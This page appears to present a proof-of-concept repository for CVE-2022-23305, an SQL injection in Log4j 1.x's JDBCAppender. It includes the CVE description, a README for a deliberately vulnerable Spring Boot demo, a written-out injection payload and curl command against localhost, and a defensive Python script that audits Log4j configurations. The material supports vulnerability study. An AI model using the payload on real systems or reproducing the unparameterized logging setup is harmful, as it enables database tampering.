CVE-2022-23305 PoC — SQL injection in JDBC Appender in Apache Log4j V1

Associated Vulnerability
Title: SQL injection in JDBC Appender in Apache Log4j V1 (CVE-2022-23305)
Description: By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
Description
CVE-2022-23305 Log4j JDBCAppender SQL injection PoC
Readme
# CVE-2022-23305 Log4j JDBCAppender SQL injection PoC

This is a very simple Spring Boot based application that demonstrates the CVE-2022-23305 vulnerability. It uses Apache Maven, Spring Boot, Spring MVC, and the H2 in-memory database to log one simple entry, taken from a URL query string parameter. Because Log4j is configured to use a JDBCAppender, the application is vulnerable to SQL injection.

See src/main/java/poc/InjectionController.java for the logging statement.  
See the src/main/resources folder for all the configuration files.

You can run the application using Java and Maven by running "mvn clean spring-boot:run".  
You can also run it as a Docker application such as:  
 docker build --tag log4j-poc .  
 docker run -p 8080:8080 log4j-poc  

The app will be available at http://localhost:8080/.  
To exploit the vulnerability, submit an injected SQL statement as the parameter that gets logged:  
 "http://localhost:8080/?param=');insert into logs values(':("  
The response lists the log entries, including the one added by the SQL injected into the parameter.  
To do the same with curl use:  
 curl 'http://localhost:8080/?param=%27);insert%20into%20logs%20values(%27:('  
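
To check whether a deployment is configured the way this PoC is, the following added example (not part of the PoC repository) scans a Log4j 1.x properties file for a JDBCAppender whose SQL embeds converters that can carry logged input. The sample configuration is constructed, not the repository's log4j.properties, and treating %m, %x and %X as the risky converters is an assumption of this example.

```python
import re

JDBC_APPENDER = "org.apache.log4j.jdbc.JDBCAppender"
# Assumption of this example: %m (message), %x (NDC) and %X (MDC) are the
# PatternLayout converters most likely to carry request-controlled text.
RISKY = re.compile(r"%-?\d*(?:\.\d+)?([mxX])")

def parse_properties(text):
    """Minimal .properties reader: comments, '=' or ':' separators, '\\' continuation."""
    props, pending = {}, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if not line or line[0] in "#!":
            continue
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        m = re.match(r"([^=:\s]+)\s*[=:]?\s*(.*)", line)
        if m:
            props[m.group(1)] = m.group(2)
    return props

def audit_log4j1_config(text):
    """Return one finding per JDBCAppender, listing risky converters in its SQL."""
    props = parse_properties(text)
    findings = []
    for key, value in props.items():
        m = re.fullmatch(r"log4j\.appender\.([^.]+)", key)
        if not m or value != JDBC_APPENDER:
            continue
        # Log4j 1.2 stores the 'sql' value as the layout pattern, so check both keys.
        sql = props.get(key + ".sql") or props.get(key + ".layout.ConversionPattern", "")
        risky = sorted(set(RISKY.findall(sql.replace("%%", ""))))  # %% is a literal percent
        findings.append({"appender": m.group(1), "sql": sql, "risky_converters": risky})
    return findings

# Constructed sample, not the repository's log4j.properties.
SAMPLE = """\
log4j.rootLogger=INFO, console, DB
log4j.appender.console=org.apache.log4j.ConsoleAppender
log4j.appender.console.layout.ConversionPattern=%d %-5p %m%n
log4j.appender.DB=org.apache.log4j.jdbc.JDBCAppender
log4j.appender.DB.URL=jdbc:h2:mem:testdb
log4j.appender.DB.sql=INSERT INTO logs VALUES('%m')
"""

if __name__ == "__main__":
    for f in audit_log4j1_config(SAMPLE):
        status = "REVIEW" if f["risky_converters"] else "ok"
        print(f'{status}: appender {f["appender"]} sql={f["sql"]!r} converters={f["risky_converters"]}')
```

A finding marks a configuration where logged text is substituted directly into the SQL string; the CVE description's remedy is to move to Log4j 2, whose JDBCAppender supports parameterized queries.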
File Snapshot

[4.0K] /data/pocs/16d36d5240b2db6601d42cbc85b2e1cbd3b741d8
├── [ 160] Dockerfile
├── [1.2K] pom.xml
├── [1.2K] README.md
└── [4.0K] src
    └── [4.0K] main
        ├── [4.0K] java
        │   └── [4.0K] poc
        │       ├── [ 332] Application.java
        │       └── [1.2K] InjectionController.java
        └── [4.0K] resources
            ├── [ 185] application.properties
            ├── [ 355] log4j.properties
            └── [  76] schema.sql

5 directories, 8 files